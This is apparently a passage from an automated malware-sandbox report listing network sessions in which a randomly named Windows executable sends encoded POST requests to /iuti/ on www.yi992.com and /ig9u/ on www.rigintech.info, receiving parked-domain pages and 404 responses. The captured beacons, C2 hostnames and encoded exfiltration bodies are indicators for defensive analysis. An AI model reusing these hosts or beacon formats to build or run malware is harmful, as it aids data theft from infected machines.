                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:25:14.632872105 CEST | 409 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 05 Sep 2024 12:25:14 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 269
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.5 | 57200 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:28.027965069 CEST | 693 | OUT | POST /iuti/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.yi992.com
                                                    Referer: http://www.yi992.com/iuti/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=sqv7nl9LTIbZIdH4TRIydnBw/kMFYUaIZeNl9eBQhgRKy8yDRAI3ZfuV1peX4m7hHSfcELYQkw9YYrTPvGNep/LwVnZRbMegfoLPrZTsvyZDxvX30kiQ0kkx9Su502IqxtFNKyPj23ofjW2iubIoYs32NBlYtkuIKKEUPdPRr7h6NauZka/A5Lg/L7xtGUQZO0eUIwU=
                                                    Sep 5, 2024 14:25:28.483258009 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:27 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1102
                                                    x-request-id: 2851622f-1411-454f-a6ec-61008623bdc7
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==
                                                    set-cookie: parking_session=2851622f-1411-454f-a6ec-61008623bdc7; expires=Thu, 05 Sep 2024 12:40:28 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:28.483275890 CEST | 555 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjg1MTYyMmYtMTQxMS00NTRmLWE2ZWMtNjEwMDg2MjNiZGM3IiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.5 | 57201 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:30.555933952 CEST | 713 | OUT | POST /iuti/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.yi992.com
                                                    Referer: http://www.yi992.com/iuti/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=sqv7nl9LTIbZaNX4fQIyVnBz6kMFR0aMZeJl9aRAhSFKyeaDSCg3cfuV9JeW3G76HSTUEJ8Qk0tYYp7Pux5ZovL+AXZTG8egfoLPrZHKv0xDx/n31Fif9Ek2riu5w2JjxtF7KzTa21QfjUuipO8vSs30DhkHu1DXFow6Oeu0zoBDBMDz+43oqrMHbo5aXkxwUXOkWnDNpY4mk6XRn35s7RjeQUdG
                                                    Sep 5, 2024 14:25:31.040836096 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:30 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1102
                                                    x-request-id: 7f33cd8c-2b95-41dd-aa6e-54739a3138f8
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==
                                                    set-cookie: parking_session=7f33cd8c-2b95-41dd-aa6e-54739a3138f8; expires=Thu, 05 Sep 2024 12:40:30 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:31.040862083 CEST | 555 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2YzM2NkOGMtMmI5NS00MWRkLWFhNmUtNTQ3MzlhMzEzOGY4IiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.5 | 57202 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:33.087347031 CEST | 1730 | OUT | POST /iuti/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.yi992.com
                                                    Referer: http://www.yi992.com/iuti/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h= [TRUNCATED]
                                                    Sep 5, 2024 14:25:33.547557116 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:32 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1102
                                                    x-request-id: cffc873e-ec61-44b9-801c-7b2c164572da
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==
                                                    set-cookie: parking_session=cffc873e-ec61-44b9-801c-7b2c164572da; expires=Thu, 05 Sep 2024 12:40:33 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JdtAsr3waICb/+KzqtXRnUyhaAXfOwJfDtq2EI4D7jCLjy2JKV8Ho3IZDc6pbK8otNN9KrQv3nWJZ9wAJ3/JdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:33.547616959 CEST | 555 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2ZmYzg3M2UtZWM2MS00NGI5LTgwMWMtN2IyYzE2NDU3MmRhIiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.5 | 57203 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:35.622976065 CEST | 444 | OUT | GET /iuti/?V6h=hoHbkVcpbob4KKGwTSg4Qmxuxm4KO3ujR6NVpJZRiS90gufBWzA0W/yR6JGFw3H3NTWRULQgnx1gCbPTi357oLTiVxRhMsTUHJ+Wl6jWlVJ6tv3Z5Sqw5Cg13CqV209vow==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.yi992.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:25:36.174249887 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:25:35 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1482
                                                    x-request-id: 2a5ae1b9-0f78-435c-9c7c-c2f912c89954
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tZq9GE0sSpNiVN5+4DgzsVny9iEIv4u4RWJJWZwFIQcSqVhmHkmg1pWvll9Z/mNhN0xHkQUvaY2ftgGPsqZ9oA==
                                                    set-cookie: parking_session=2a5ae1b9-0f78-435c-9c7c-c2f912c89954; expires=Thu, 05 Sep 2024 12:40:36 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tZq9GE0sSpNiVN5+4DgzsVny9iEIv4u4RWJJWZwFIQcSqVhmHkmg1pWvll9Z/mNhN0xHkQUvaY2ftgGPsqZ9oA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:25:36.174282074 CEST | 935 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmE1YWUxYjktMGY3OC00MzVjLTljN2MtYzJmOTEyYzg5OTU0IiwicGFnZV90aW1lIjoxNzI1NTM5MT


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.5 | 57204 | 162.0.213.94 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:50.058168888 CEST | 708 | OUT | POST /ig9u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.rigintech.info
                                                    Referer: http://www.rigintech.info/ig9u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=Ouz5E1YVcDKsa+XIWffuM0c6FqMq/Ybz4JrQyHAnwgZIJEDRjk1r7GvD5EClPvypJj5IhkKd/t3seY8MYL2/UAjkB4ThwdI3CFlYMOZiz3BpxLkQLw7kGiyEHGieeoo+Gx3hpNU1ZtT0RaJE44MZMBS4Tn6LkhBPKx3MC8i3Xv2WmvgYAKhWP7GBUToQJk2usyOFUaM=
                                                    Sep 5, 2024 14:25:50.658869028 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:50 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:50.658911943 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                    Sep 5, 2024 14:25:50.658925056 CEST | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                    Sep 5, 2024 14:25:50.658937931 CEST | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                    Sep 5, 2024 14:25:50.658951044 CEST | 896 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                    Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                    Sep 5, 2024 14:25:50.659126997 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                    Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                    Sep 5, 2024 14:25:50.659152985 CEST | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                    Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                    Sep 5, 2024 14:25:50.659163952 CEST | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                    Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                    Sep 5, 2024 14:25:50.659312963 CEST | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                    Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                    Sep 5, 2024 14:25:50.659326077 CEST | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                    Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                    Sep 5, 2024 14:25:50.664133072 CEST | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                    Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.5 | 57205 | 162.0.213.94 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:52.601150990 CEST | 728 | OUT | POST /ig9u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.rigintech.info
                                                    Referer: http://www.rigintech.info/ig9u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4f 75 7a 35 45 31 59 56 63 44 4b 73 61 65 6e 49 55 38 48 75 4b 55 63 35 41 71 4d 71 6b 6f 61 34 34 4a 58 51 79 47 56 73 77 54 74 49 49 67 48 52 78 32 64 72 72 57 76 44 32 6b 44 75 43 50 79 59 4a 6a 30 39 68 6b 6d 64 2f 74 6a 73 65 63 30 4d 59 34 65 77 56 51 6a 6d 4f 59 54 6e 75 74 49 33 43 46 6c 59 4d 4b 4a 59 7a 7a 6c 70 78 62 55 51 45 31 61 79 59 79 79 48 43 32 69 65 56 49 6f 36 47 78 33 48 70 4d 59 62 5a 76 72 30 52 59 42 45 37 74 67 61 43 42 53 45 63 48 37 6c 6e 6a 45 56 4c 7a 2b 48 47 76 37 2f 47 66 69 55 71 35 4e 79 61 6f 70 2b 63 62 71 35 45 41 67 6e 59 55 58 48 32 52 65 31 4b 4e 61 4b 30 37 6b 4c 72 41 72 31 57 61 6c 58 2f 47 45 7a 45 56 68 42
                                                    Data Ascii: V6h=Ouz5E1YVcDKsaenIU8HuKUc5AqMqkoa44JXQyGVswTtIIgHRx2drrWvD2kDuCPyYJj09hkmd/tjsec0MY4ewVQjmOYTnutI3CFlYMKJYzzlpxbUQE1ayYyyHC2ieVIo6Gx3HpMYbZvr0RYBE7tgaCBSEcH7lnjEVLz+HGv7/GfiUq5Nyaop+cbq5EAgnYUXH2Re1KNaK07kLrAr1WalX/GEzEVhB
                                                    Sep 5, 2024 14:25:53.203957081 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:53 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
